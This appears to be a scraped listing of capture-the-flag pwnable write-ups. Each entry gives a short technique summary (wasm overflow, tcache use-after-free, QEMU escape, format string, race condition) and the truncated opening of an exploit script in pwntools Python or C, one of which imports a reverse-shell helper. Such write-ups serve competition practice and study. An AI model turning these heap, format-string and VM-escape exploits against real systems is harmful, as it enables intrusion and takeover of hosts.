Category : pwnable Summary : wasm, bof, trigger function table index oob Exploit #!/usr/bin/python from pwn import * from paul45 import reverse_shell import requests as r URL = 'http://0:23333' def add_person(name, is_tutor): res = r.get(URL + '/add_person', params={'name':name, 'is_tutor':is_tutor}).text idx = int(res[len('create person done, person id = '..
Category : pwnable CLV2 489 3 Solves Pwn me, and Prove yourself nc clv2.pwn.seccon.jp 31337 Summary : tcache, use after free Exploit #!/usr/bin/python from pwn import * def cmd_register(name): ru('[E]xit\n') sl('R') ru('name?\n') sl(name) return rl(False).split(' ')[0] def cmd_login(name): ru('[E]xit\n') sl('L') ru('User : ') sl(name) def cmd_play(): ru('[E]xit\n') sl('P') def cmd_add_prov(method, w..
Category : pwnable Summary : qemu escape Exploit #include #include #include #include #include #include #include #include #include #define OOO_ALLOCATE 0x000000 #define OOO_FREE 0x100000 #define OOO_WRITE 0x200000 #define MAP_SIZE 0x1000000 #define OOO_BIN_BASE 0x1317940 #define FREE_GOT 0x11301a0 #define OOO_MAGIC_GADGET 0x6e65f9 int fd; char *mmio; uint64_t ooo_read(uint32_t idx, uint32_t offset..
Category : pwnable Summary : qemu escape Exploit #include #include #include #include #include #include #include #include #include #include #define IOMEM_A 0xfe900000 #define IOMEM_B 0xfea00000 #define IOPORT_A 0xc000 #define IOPORT_B 0xc100 #define MMIO_SRC 0x04 #define MMIO_DST 0x08 #define MMIO_COPY 0x20 #define MMIO_CMD 0x24 #define MMIO_TIMER 0x80 #define MMIO_EXPIRE_LO 0x88 #define MMIO_EXP..
Category : pwnable Summary : qemu escape Exploit #include #include #include #include #include #include #include #include #include #include #define SRC_LO 0x80 #define SRC_HI 0x84 #define DST_LO 0x88 #define DST_HI 0x8c #define CNT 0x90 #define TIMER 0x98 #define TIMER_READ 0x1 #define TIMER_WRITE 0x3 #define TIMER_ENC 0x4 #define MAP_SIZE 0x1000 #define PAGE_SHIFT 12 #define PAGE_SIZE (1 enc = s..
Category : pwnable Summary : uaf, tcache, show function, confusion between tcache and fastbin, 2 notes Exploit #!/usr/bin/python from pwn import * def cmd_add(data): ru('Your choice:') ss('1\x00') ru('Input the content:') ss(data) ru('Done!\n') def cmd_edit(idx, data): ru('Your choice:') ss('2\x00') ru('Input the idx:') ss(str(idx)+'\x00') ru('Input the content:') ss(data) ru('Done!\n') def cmd_d..
Category : pwnable secret_message 494 2 Solves Let's share a secret with us nc secret-message.pwn.seccon.jp 31337 (Hint: We allow a "little" bruteforcing to secret_message only.) Summary : ascii art, out of boundary, double staged format string attack, * precision, fread, fwrite I started this challenge in the wrong direction, thinking it had to be solved with an off-by-one vulnerability. It can be solved with an fsb vulnerability. Since the challenge description allows "little" brute force..
Category : pwnable Summary : race condition, heap overflow, no free, top chunk into fastbin Race condition write-up to be added Exploit #!/usr/bin/python from pwn import * def cmd_add(times, **arg): ru('>> ') sl('1') ru('How many chunks at a time (1/2) ? ') sl(str(times)) if times == 2: # thread-1 ru('\nEnter Size 1: ') sl(str(arg['size'][0])) ru('\nEnter Author name : ') time.sleep(5) # thread-2 ru('\nEnter..